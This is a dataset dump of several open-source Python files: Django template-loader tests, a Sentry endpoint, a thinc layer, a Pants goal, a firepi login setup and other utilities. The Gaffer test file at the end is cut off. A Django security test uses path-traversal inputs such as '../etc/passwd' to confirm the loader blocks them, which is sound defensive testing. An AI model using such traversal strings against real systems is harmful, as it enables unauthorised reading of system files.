text
stringlengths 4
1.02M
| meta
dict |
---|---|
import logging
import unittest
from nose.plugins.attrib import attr
from tests.cook import cli, util
@attr(cli=True)
@unittest.skipUnless(util.multi_cluster_tests_enabled(),
'Requires setting the COOK_MULTI_CLUSTER environment variable')
class MultiCookCliTest(unittest.TestCase):
_multiprocess_can_split_ = True
def setUp(self):
self.cook_url_1 = util.retrieve_cook_url()
self.cook_url_2 = util.retrieve_cook_url('COOK_SCHEDULER_URL_2', 'http://localhost:22321')
self.logger = logging.getLogger(__name__)
util.wait_for_cook(self.cook_url_1)
util.wait_for_cook(self.cook_url_2)
def test_federated_query(self):
# Submit to cluster #1
cp, uuids = cli.submit('ls', self.cook_url_1)
self.assertEqual(0, cp.returncode, cp.stderr)
uuid_1 = uuids[0]
# Submit to cluster #2
cp, uuids = cli.submit('ls', self.cook_url_2)
self.assertEqual(0, cp.returncode, cp.stderr)
uuid_2 = uuids[0]
# Single query for both jobs, federated across clusters
config = {'clusters': [{'name': 'cook1', 'url': self.cook_url_1},
{'name': 'cook2', 'url': self.cook_url_2}]}
with cli.temp_config_file(config) as path:
cp = cli.wait([uuid_1, uuid_2], flags='--config %s' % path)
self.assertEqual(0, cp.returncode, cp.stderr)
cp, jobs = cli.show_json([uuid_1, uuid_2], flags='--config %s' % path)
uuids = [job['uuid'] for job in jobs]
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(2, len(jobs), jobs)
self.assertIn(str(uuid_1), uuids)
self.assertIn(str(uuid_2), uuids)
self.assertEqual('completed', jobs[0]['status'])
self.assertEqual('completed', jobs[1]['status'])
| {
"content_hash": "ad3e5ef246e63db99ff9cbe002ae979c",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 98,
"avg_line_length": 40.630434782608695,
"alnum_prop": 0.599250936329588,
"repo_name": "m4ce/Cook",
"id": "d389c95c8036836394a5b243b68a0f4e7eb561af",
"size": "1869",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "integration/tests/cook/test_cli_multi_cook.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Clojure",
"bytes": "1092671"
},
{
"name": "Java",
"bytes": "159333"
},
{
"name": "Python",
"bytes": "205274"
},
{
"name": "Shell",
"bytes": "15716"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from sentry.api.bases.avatar import AvatarMixin
from sentry.api.bases.organization import OrganizationEndpoint
from sentry.models import OrganizationAvatar
class OrganizationAvatarEndpoint(AvatarMixin, OrganizationEndpoint):
object_type = "organization"
model = OrganizationAvatar
def get_avatar_filename(self, obj):
# for consistency with organization details endpoint
return u"{}.png".format(obj.slug)
| {
"content_hash": "ee2097682b4dd47f5240d9b04bccde58",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 68,
"avg_line_length": 33.92857142857143,
"alnum_prop": 0.7768421052631579,
"repo_name": "mvaled/sentry",
"id": "2114eb459d196bdd07fc1d4438babc58668fb9c6",
"size": "475",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "src/sentry/api/endpoints/organization_avatar.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "226439"
},
{
"name": "Dockerfile",
"bytes": "6431"
},
{
"name": "HTML",
"bytes": "173429"
},
{
"name": "JavaScript",
"bytes": "9314175"
},
{
"name": "Lua",
"bytes": "65885"
},
{
"name": "Makefile",
"bytes": "9225"
},
{
"name": "Python",
"bytes": "50385401"
},
{
"name": "Ruby",
"bytes": "168"
},
{
"name": "Shell",
"bytes": "5685"
},
{
"name": "TypeScript",
"bytes": "773664"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import os.path
import sys
import tempfile
import types
import unittest
from contextlib import contextmanager
from django.template import Context, TemplateDoesNotExist
from django.template.engine import Engine
from django.test import SimpleTestCase, ignore_warnings, override_settings
from django.utils import six
from django.utils.deprecation import RemovedInDjango20Warning
from .utils import TEMPLATE_DIR
try:
import pkg_resources
except ImportError:
pkg_resources = None
class CachedLoaderTests(SimpleTestCase):
def setUp(self):
self.engine = Engine(
dirs=[TEMPLATE_DIR],
loaders=[
('django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader',
]),
],
)
def test_get_template(self):
template = self.engine.get_template('index.html')
self.assertEqual(template.origin.name, os.path.join(TEMPLATE_DIR, 'index.html'))
self.assertEqual(template.origin.template_name, 'index.html')
self.assertEqual(template.origin.loader, self.engine.template_loaders[0].loaders[0])
cache = self.engine.template_loaders[0].get_template_cache
self.assertEqual(cache['index.html'], template)
# Run a second time from cache
template = self.engine.get_template('index.html')
self.assertEqual(template.origin.name, os.path.join(TEMPLATE_DIR, 'index.html'))
self.assertEqual(template.origin.template_name, 'index.html')
self.assertEqual(template.origin.loader, self.engine.template_loaders[0].loaders[0])
def test_get_template_missing(self):
with self.assertRaises(TemplateDoesNotExist):
self.engine.get_template('doesnotexist.html')
e = self.engine.template_loaders[0].get_template_cache['doesnotexist.html']
self.assertEqual(e.args[0], 'doesnotexist.html')
@ignore_warnings(category=RemovedInDjango20Warning)
def test_load_template(self):
loader = self.engine.template_loaders[0]
template, origin = loader.load_template('index.html')
self.assertEqual(template.origin.template_name, 'index.html')
cache = self.engine.template_loaders[0].template_cache
self.assertEqual(cache['index.html'][0], template)
# Run a second time from cache
loader = self.engine.template_loaders[0]
source, name = loader.load_template('index.html')
self.assertEqual(template.origin.template_name, 'index.html')
@ignore_warnings(category=RemovedInDjango20Warning)
def test_load_template_missing(self):
"""
#19949 -- TemplateDoesNotExist exceptions should be cached.
"""
loader = self.engine.template_loaders[0]
self.assertFalse('missing.html' in loader.template_cache)
with self.assertRaises(TemplateDoesNotExist):
loader.load_template("missing.html")
self.assertEqual(
loader.template_cache["missing.html"],
TemplateDoesNotExist,
"Cached loader failed to cache the TemplateDoesNotExist exception",
)
@ignore_warnings(category=RemovedInDjango20Warning)
def test_load_nonexistent_cached_template(self):
loader = self.engine.template_loaders[0]
template_name = 'nonexistent.html'
# fill the template cache
with self.assertRaises(TemplateDoesNotExist):
loader.find_template(template_name)
with self.assertRaisesMessage(TemplateDoesNotExist, template_name):
loader.get_template(template_name)
def test_templatedir_caching(self):
"""
#13573 -- Template directories should be part of the cache key.
"""
# Retrieve a template specifying a template directory to check
t1, name = self.engine.find_template('test.html', (os.path.join(TEMPLATE_DIR, 'first'),))
# Now retrieve the same template name, but from a different directory
t2, name = self.engine.find_template('test.html', (os.path.join(TEMPLATE_DIR, 'second'),))
# The two templates should not have the same content
self.assertNotEqual(t1.render(Context({})), t2.render(Context({})))
@unittest.skipUnless(pkg_resources, 'setuptools is not installed')
class EggLoaderTests(SimpleTestCase):
@contextmanager
def create_egg(self, name, resources):
"""
Creates a mock egg with a list of resources.
name: The name of the module.
resources: A dictionary of template names mapped to file-like objects.
"""
if six.PY2:
name = name.encode('utf-8')
class MockLoader(object):
pass
class MockProvider(pkg_resources.NullProvider):
def __init__(self, module):
pkg_resources.NullProvider.__init__(self, module)
self.module = module
def _has(self, path):
return path in self.module._resources
def _isdir(self, path):
return False
def get_resource_stream(self, manager, resource_name):
return self.module._resources[resource_name]
def _get(self, path):
return self.module._resources[path].read()
def _fn(self, base, resource_name):
return os.path.normcase(resource_name)
egg = types.ModuleType(name)
egg.__loader__ = MockLoader()
egg.__path__ = ['/some/bogus/path/']
egg.__file__ = '/some/bogus/path/__init__.pyc'
egg._resources = resources
sys.modules[name] = egg
pkg_resources._provider_factories[MockLoader] = MockProvider
try:
yield
finally:
del sys.modules[name]
del pkg_resources._provider_factories[MockLoader]
@classmethod
@ignore_warnings(category=RemovedInDjango20Warning)
def setUpClass(cls):
cls.engine = Engine(loaders=[
'django.template.loaders.eggs.Loader',
])
cls.loader = cls.engine.template_loaders[0]
super(EggLoaderTests, cls).setUpClass()
def test_get_template(self):
templates = {
os.path.normcase('templates/y.html'): six.StringIO("y"),
}
with self.create_egg('egg', templates):
with override_settings(INSTALLED_APPS=['egg']):
template = self.engine.get_template("y.html")
self.assertEqual(template.origin.name, 'egg:egg:templates/y.html')
self.assertEqual(template.origin.template_name, 'y.html')
self.assertEqual(template.origin.loader, self.engine.template_loaders[0])
output = template.render(Context({}))
self.assertEqual(output, "y")
@ignore_warnings(category=RemovedInDjango20Warning)
def test_load_template_source(self):
loader = self.engine.template_loaders[0]
templates = {
os.path.normcase('templates/y.html'): six.StringIO("y"),
}
with self.create_egg('egg', templates):
with override_settings(INSTALLED_APPS=['egg']):
source, name = loader.load_template_source('y.html')
self.assertEqual(source.strip(), 'y')
self.assertEqual(name, 'egg:egg:templates/y.html')
def test_non_existing(self):
"""
Template loading fails if the template is not in the egg.
"""
with self.create_egg('egg', {}):
with override_settings(INSTALLED_APPS=['egg']):
with self.assertRaises(TemplateDoesNotExist):
self.engine.get_template('not-existing.html')
def test_not_installed(self):
"""
Template loading fails if the egg is not in INSTALLED_APPS.
"""
templates = {
os.path.normcase('templates/y.html'): six.StringIO("y"),
}
with self.create_egg('egg', templates):
with self.assertRaises(TemplateDoesNotExist):
self.engine.get_template('y.html')
class FileSystemLoaderTests(SimpleTestCase):
@classmethod
def setUpClass(cls):
cls.engine = Engine(dirs=[TEMPLATE_DIR])
super(FileSystemLoaderTests, cls).setUpClass()
@contextmanager
def set_dirs(self, dirs):
original_dirs = self.engine.dirs
self.engine.dirs = dirs
try:
yield
finally:
self.engine.dirs = original_dirs
@contextmanager
def source_checker(self, dirs):
loader = self.engine.template_loaders[0]
def check_sources(path, expected_sources):
expected_sources = [os.path.abspath(s) for s in expected_sources]
self.assertEqual(
[origin.name for origin in loader.get_template_sources(path)],
expected_sources,
)
with self.set_dirs(dirs):
yield check_sources
def test_get_template(self):
template = self.engine.get_template('index.html')
self.assertEqual(template.origin.name, os.path.join(TEMPLATE_DIR, 'index.html'))
self.assertEqual(template.origin.template_name, 'index.html')
self.assertEqual(template.origin.loader, self.engine.template_loaders[0])
self.assertEqual(template.origin.loader_name, 'django.template.loaders.filesystem.Loader')
@ignore_warnings(category=RemovedInDjango20Warning)
def test_load_template_source(self):
loader = self.engine.template_loaders[0]
source, name = loader.load_template_source('index.html')
self.assertEqual(source.strip(), 'index')
self.assertEqual(name, os.path.join(TEMPLATE_DIR, 'index.html'))
def test_directory_security(self):
with self.source_checker(['/dir1', '/dir2']) as check_sources:
check_sources('index.html', ['/dir1/index.html', '/dir2/index.html'])
check_sources('/etc/passwd', [])
check_sources('etc/passwd', ['/dir1/etc/passwd', '/dir2/etc/passwd'])
check_sources('../etc/passwd', [])
check_sources('../../../etc/passwd', [])
check_sources('/dir1/index.html', ['/dir1/index.html'])
check_sources('../dir2/index.html', ['/dir2/index.html'])
check_sources('/dir1blah', [])
check_sources('../dir1blah', [])
def test_unicode_template_name(self):
with self.source_checker(['/dir1', '/dir2']) as check_sources:
# UTF-8 bytestrings are permitted.
check_sources(b'\xc3\x85ngstr\xc3\xb6m', ['/dir1/Ångström', '/dir2/Ångström'])
# Unicode strings are permitted.
check_sources('Ångström', ['/dir1/Ångström', '/dir2/Ångström'])
def test_utf8_bytestring(self):
"""
Invalid UTF-8 encoding in bytestrings should raise a useful error
"""
engine = Engine()
loader = engine.template_loaders[0]
with self.assertRaises(UnicodeDecodeError):
list(loader.get_template_sources(b'\xc3\xc3', ['/dir1']))
def test_unicode_dir_name(self):
with self.source_checker([b'/Stra\xc3\x9fe']) as check_sources:
check_sources('Ångström', ['/Straße/Ångström'])
check_sources(b'\xc3\x85ngstr\xc3\xb6m', ['/Straße/Ångström'])
@unittest.skipUnless(
os.path.normcase('/TEST') == os.path.normpath('/test'),
"This test only runs on case-sensitive file systems.",
)
def test_case_sensitivity(self):
with self.source_checker(['/dir1', '/DIR2']) as check_sources:
check_sources('index.html', ['/dir1/index.html', '/DIR2/index.html'])
check_sources('/DIR1/index.HTML', ['/DIR1/index.HTML'])
def test_file_does_not_exist(self):
with self.assertRaises(TemplateDoesNotExist):
self.engine.get_template('doesnotexist.html')
@unittest.skipIf(
sys.platform == 'win32',
"Python on Windows doesn't have working os.chmod().",
)
def test_permissions_error(self):
with tempfile.NamedTemporaryFile() as tmpfile:
tmpdir = os.path.dirname(tmpfile.name)
tmppath = os.path.join(tmpdir, tmpfile.name)
os.chmod(tmppath, 0o0222)
with self.set_dirs([tmpdir]):
with self.assertRaisesMessage(IOError, 'Permission denied'):
self.engine.get_template(tmpfile.name)
def test_notafile_error(self):
with self.assertRaises(IOError):
self.engine.get_template('first')
class AppDirectoriesLoaderTests(SimpleTestCase):
@classmethod
def setUpClass(cls):
cls.engine = Engine(
loaders=['django.template.loaders.app_directories.Loader'],
)
super(AppDirectoriesLoaderTests, cls).setUpClass()
@override_settings(INSTALLED_APPS=['template_tests'])
def test_get_template(self):
template = self.engine.get_template('index.html')
self.assertEqual(template.origin.name, os.path.join(TEMPLATE_DIR, 'index.html'))
self.assertEqual(template.origin.template_name, 'index.html')
self.assertEqual(template.origin.loader, self.engine.template_loaders[0])
@ignore_warnings(category=RemovedInDjango20Warning)
@override_settings(INSTALLED_APPS=['template_tests'])
def test_load_template_source(self):
loader = self.engine.template_loaders[0]
source, name = loader.load_template_source('index.html')
self.assertEqual(source.strip(), 'index')
self.assertEqual(name, os.path.join(TEMPLATE_DIR, 'index.html'))
@override_settings(INSTALLED_APPS=[])
def test_not_installed(self):
with self.assertRaises(TemplateDoesNotExist):
self.engine.get_template('index.html')
class LocmemLoaderTests(SimpleTestCase):
@classmethod
def setUpClass(cls):
cls.engine = Engine(
loaders=[('django.template.loaders.locmem.Loader', {
'index.html': 'index',
})],
)
super(LocmemLoaderTests, cls).setUpClass()
def test_get_template(self):
template = self.engine.get_template('index.html')
self.assertEqual(template.origin.name, 'index.html')
self.assertEqual(template.origin.template_name, 'index.html')
self.assertEqual(template.origin.loader, self.engine.template_loaders[0])
@ignore_warnings(category=RemovedInDjango20Warning)
def test_load_template_source(self):
loader = self.engine.template_loaders[0]
source, name = loader.load_template_source('index.html')
self.assertEqual(source.strip(), 'index')
self.assertEqual(name, 'index.html')
| {
"content_hash": "179063ea53a9448a197053d73c8c3924",
"timestamp": "",
"source": "github",
"line_count": 387,
"max_line_length": 98,
"avg_line_length": 37.917312661498705,
"alnum_prop": 0.6332969878697016,
"repo_name": "rynomster/django",
"id": "11f20c6debffd098311ecefe18885fff1ef04d3f",
"size": "14716",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/template_tests/test_loaders.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "52372"
},
{
"name": "HTML",
"bytes": "170531"
},
{
"name": "JavaScript",
"bytes": "256023"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11518250"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
} |
import os
def _get_cache_dir_path():
return os.path.join(os.path.expanduser('~/.local/share'), 'atcoder-tools')
def get_cache_file_path(filename: str):
return os.path.join(_get_cache_dir_path(), filename)
| {
"content_hash": "31529f4de921e0bb536da085185d76b6",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 78,
"avg_line_length": 24.11111111111111,
"alnum_prop": 0.6866359447004609,
"repo_name": "kyuridenamida/atcoder-tools",
"id": "5222f6e99f08b87739e3450139424954dbca207f",
"size": "217",
"binary": false,
"copies": "2",
"ref": "refs/heads/stable",
"path": "atcodertools/fileutils/artifacts_cache.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "16188"
},
{
"name": "C++",
"bytes": "21899"
},
{
"name": "CSS",
"bytes": "719"
},
{
"name": "D",
"bytes": "6304"
},
{
"name": "Go",
"bytes": "6875"
},
{
"name": "HTML",
"bytes": "341695"
},
{
"name": "Java",
"bytes": "7287"
},
{
"name": "JavaScript",
"bytes": "64422"
},
{
"name": "Julia",
"bytes": "10348"
},
{
"name": "Nim",
"bytes": "7595"
},
{
"name": "Python",
"bytes": "262284"
},
{
"name": "Roff",
"bytes": "3669"
},
{
"name": "Rust",
"bytes": "12241"
},
{
"name": "SCSS",
"bytes": "45"
},
{
"name": "Shell",
"bytes": "1320"
},
{
"name": "Swift",
"bytes": "7732"
},
{
"name": "TypeScript",
"bytes": "48032"
}
],
"symlink_target": ""
} |
import json
from pants.backend.experimental.java.register import rules as java_rules
from pants.backend.java.dependency_inference.types import JavaSourceDependencyAnalysis
from pants.backend.java.target_types import JavaFieldSet
from pants.core.util_rules.source_files import SourceFilesRequest
from pants.engine.console import Console
from pants.engine.goal import Goal, GoalSubsystem
from pants.engine.internals.selectors import Get, MultiGet
from pants.engine.rules import collect_rules, goal_rule
from pants.engine.target import Targets
from pants.jvm.goals import debug_goals
class DumpJavaSourceAnalysisSubsystem(GoalSubsystem):
name = "java-dump-source-analysis"
help = "Dump source analysis for java_source[s] targets."
class DumpJavaSourceAnalysis(Goal):
subsystem_cls = DumpJavaSourceAnalysisSubsystem
environment_behavior = Goal.EnvironmentBehavior.LOCAL_ONLY # TODO(#17129) — Migrate this.
@goal_rule
async def dump_java_source_analysis(targets: Targets, console: Console) -> DumpJavaSourceAnalysis:
java_source_field_sets = [
JavaFieldSet.create(tgt) for tgt in targets if JavaFieldSet.is_applicable(tgt)
]
java_source_analysis = await MultiGet(
Get(JavaSourceDependencyAnalysis, SourceFilesRequest([fs.sources]))
for fs in java_source_field_sets
)
java_source_analysis_json = [
{"address": str(fs.address), **analysis.to_debug_json_dict()}
for (fs, analysis) in zip(java_source_field_sets, java_source_analysis)
]
console.print_stdout(json.dumps(java_source_analysis_json))
return DumpJavaSourceAnalysis(exit_code=0)
def rules():
return [
*collect_rules(),
*java_rules(),
*debug_goals.rules(),
]
| {
"content_hash": "6412ccb1a4a884218e755d75c4c50617",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 98,
"avg_line_length": 37.02127659574468,
"alnum_prop": 0.7477011494252873,
"repo_name": "pantsbuild/pants",
"id": "f1f5493588472a5c693f94deebd26a4c8616a404",
"size": "1874",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "src/python/pants/backend/java/goals/debug_goals.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "688"
},
{
"name": "Dockerfile",
"bytes": "1132"
},
{
"name": "Go",
"bytes": "67315"
},
{
"name": "Java",
"bytes": "97190"
},
{
"name": "Kotlin",
"bytes": "6433"
},
{
"name": "Mustache",
"bytes": "3771"
},
{
"name": "Python",
"bytes": "7582858"
},
{
"name": "Rust",
"bytes": "1657282"
},
{
"name": "Scala",
"bytes": "21950"
},
{
"name": "Shell",
"bytes": "31400"
},
{
"name": "Starlark",
"bytes": "76892"
}
],
"symlink_target": ""
} |
"""
Given an integer, write a function to determine if it is a power of two.
"""
__author__ = 'Daniel'
class Solution:
def isPowerOfTwo(self, n):
"""
Bit manipulation
:type n: int
:rtype: bool
"""
if n <= 0:
return False
return n & (n-1) == 0 | {
"content_hash": "2a513e52197c448f54daab721ad6f29c",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 72,
"avg_line_length": 18.647058823529413,
"alnum_prop": 0.49842271293375395,
"repo_name": "ee08b397/LeetCode-4",
"id": "88c22349a06b5b0740f437d1595aca73001d23e0",
"size": "317",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "231 Power of Two.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "555639"
}
],
"symlink_target": ""
} |
from typing import Tuple, Callable, Optional, cast
from ..model import Model
from ..config import registry
from ..types import Floats1d, Floats2d
from ..initializers import glorot_uniform_init, zero_init
from ..util import get_width, partial
InT = Floats2d
OutT = Floats2d
@registry.layers("Linear.v1")
def Linear(
nO: Optional[int] = None,
nI: Optional[int] = None,
*,
init_W: Callable = glorot_uniform_init,
init_b: Callable = zero_init,
) -> Model[InT, OutT]:
"""Multiply inputs by a weights matrix and adds a bias vector."""
return Model(
"linear",
forward,
init=partial(init, init_W, init_b),
dims={"nO": nO, "nI": nI},
params={"W": None, "b": None},
)
def forward(model: Model[InT, OutT], X: InT, is_train: bool) -> Tuple[OutT, Callable]:
W = cast(Floats2d, model.get_param("W"))
b = cast(Floats1d, model.get_param("b"))
Y = model.ops.gemm(X, W, trans2=True)
Y += b
def backprop(dY: OutT) -> InT:
model.inc_grad("b", dY.sum(axis=0))
model.inc_grad("W", model.ops.gemm(dY, X, trans1=True))
return model.ops.gemm(dY, W)
return Y, backprop
def init(
init_W: Callable,
init_b: Callable,
model: Model[InT, OutT],
X: Optional[InT] = None,
Y: Optional[OutT] = None,
) -> None:
if X is not None:
model.set_dim("nI", get_width(X))
if Y is not None:
model.set_dim("nO", get_width(Y))
model.set_param("W", init_W(model.ops, (model.get_dim("nO"), model.get_dim("nI"))))
model.set_param("b", init_b(model.ops, (model.get_dim("nO"),)))
| {
"content_hash": "650cce39013e749b8a6c8f6e201ab5bf",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 87,
"avg_line_length": 27.775862068965516,
"alnum_prop": 0.6039726877715704,
"repo_name": "explosion/thinc",
"id": "c6dc1b350b15f457f534aa21129604b58d8b5dbf",
"size": "1611",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "thinc/layers/linear.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "14601"
},
{
"name": "Cuda",
"bytes": "23473"
},
{
"name": "Cython",
"bytes": "77312"
},
{
"name": "Dockerfile",
"bytes": "430"
},
{
"name": "JavaScript",
"bytes": "57198"
},
{
"name": "Python",
"bytes": "668790"
},
{
"name": "Sass",
"bytes": "29988"
},
{
"name": "Shell",
"bytes": "364"
}
],
"symlink_target": ""
} |
import requests
import ConfigParser
from getpass import getpass
class Setup:
URLS = {
"1": "https://www.fireservicerota.co.uk",
"2": "https://www.brandweerrooster.nl"
}
CONFIG_FILE = '.local_settings.ini'
domain = None
api_key = None
def __init__(self):
pass
def get_settings(self):
self.read_configuration()
while(not self.is_configured()):
self.ask_user()
self.write_configuration()
return {'domain': self.domain, 'api_key': self.api_key}
def is_configured(self):
return self.domain != None and self.api_key != None
def read_configuration(self):
config = ConfigParser.ConfigParser()
config.read(self.CONFIG_FILE)
try:
self.domain = config.get('Main', 'Domain')
self.api_key = config.get('Main', 'APIKey')
finally:
return
def write_configuration(self):
config = ConfigParser.ConfigParser()
config.add_section('Main')
config.set('Main', 'Domain', self.domain)
config.set('Main', 'APIKey', self.api_key)
cfgfile = open('.local_settings.ini', 'w')
config.write(cfgfile)
cfgfile.close()
def get_api_key(self):
url_template = '{}/api/sessions'
url = url_template.format(self.domain)
result = requests.post(url, json = {'user_login': self.email, 'password': self.password})
response_json = result.json()
success = response_json['success']
if(success):
return response_json['auth_token']
else:
return None
def ask_user(self):
while True:
self.ask_system_choice()
self.ask_email()
self.ask_password()
self.api_key = self.get_api_key()
if self.api_key:
print "Logged in"
print
return
else:
print
print "Invalid email or password. Please try again"
print
def ask_email(self):
self.email = raw_input("Please enter your email address: ")
def ask_password(self):
self.password = getpass("Please enter your password: ")
def ask_system_choice(self):
print "Please select the system you use"
print "1. FireServiceRota (international)"
print "2. Brandweerrooster (Netherlands)"
while True:
self.system_choice = raw_input("Please enter 1 or 2: ")
if self.system_choice in ["1", "2"]:
break
self.domain = self.URLS[self.system_choice]
return
| {
"content_hash": "67edf8ddf3592ccc10ce4651433df890",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 93,
"avg_line_length": 24.83157894736842,
"alnum_prop": 0.6299279355659178,
"repo_name": "rhomeister/firepi",
"id": "5b229462fa8c147896abfdf6592cf246b8ca0220",
"size": "2377",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "firepi/setup.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "16251"
}
],
"symlink_target": ""
} |
import unittest
import os
import imath
import IECore
import Gaffer
import GafferTest
class MetadataAlgoTest( GafferTest.TestCase ) :
def testReadOnly( self ) :
n = GafferTest.AddNode()
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), False )
Gaffer.MetadataAlgo.setReadOnly( n["op1"], True )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), True )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), True )
Gaffer.MetadataAlgo.setReadOnly( n, True )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), True )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), True )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), True )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), True )
Gaffer.MetadataAlgo.setReadOnly( n["op1"], False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), True )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), True )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), True )
with self.assertRaisesRegex( Exception, r"did not match C\+\+ signature" ) :
Gaffer.MetadataAlgo.readOnly( None )
def testReadOnlyReason( self ) :
b = Gaffer.Box()
b["b"] = Gaffer.Box()
n = GafferTest.AddNode()
b["b"]["n"] = n
self.assertIsNone( Gaffer.MetadataAlgo.readOnlyReason( n ) )
self.assertIsNone( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ) )
Gaffer.MetadataAlgo.setReadOnly( b, True )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n ), b )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ), b )
Gaffer.MetadataAlgo.setReadOnly( b["b"], True )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ), b )
Gaffer.MetadataAlgo.setReadOnly( b["b"]["n"], True )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ), b )
Gaffer.MetadataAlgo.setReadOnly( b["b"]["n"]["op1"], True )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ), b )
Gaffer.MetadataAlgo.setReadOnly( b, False )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ), b["b"] )
Gaffer.MetadataAlgo.setReadOnly( b["b"], False )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ), n )
Gaffer.MetadataAlgo.setReadOnly( b["b"]["n"], False )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ), n["op1"] )
Gaffer.MetadataAlgo.setReadOnly( b["b"]["n"]["op1"], False )
self.assertIsNone( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ) )
with self.assertRaisesRegex( Exception, r"did not match C\+\+ signature" ) :
Gaffer.MetadataAlgo.readOnlyReason( None )
def testChildNodesAreReadOnly( self ) :
b = Gaffer.Box()
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.getChildNodesAreReadOnly( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( b ), False )
p1 = Gaffer.IntPlug( "boxPlug", Gaffer.Plug.Direction.In )
b.addChild( p1 )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( p1 ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( p1 ), False )
n = GafferTest.AddNode()
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), False )
b.addChild( n )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), False )
Gaffer.MetadataAlgo.setChildNodesAreReadOnly( b, True )
self.assertEqual( Gaffer.MetadataAlgo.getChildNodesAreReadOnly( b ), True )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( p1 ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), True )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), True )
Gaffer.MetadataAlgo.setChildNodesAreReadOnly( b, False )
self.assertEqual( Gaffer.MetadataAlgo.getChildNodesAreReadOnly( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( p1 ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), False )
def testBookmarks( self ) :
b = Gaffer.Box()
b["n0"] = GafferTest.AddNode()
b["n1"] = GafferTest.AddNode()
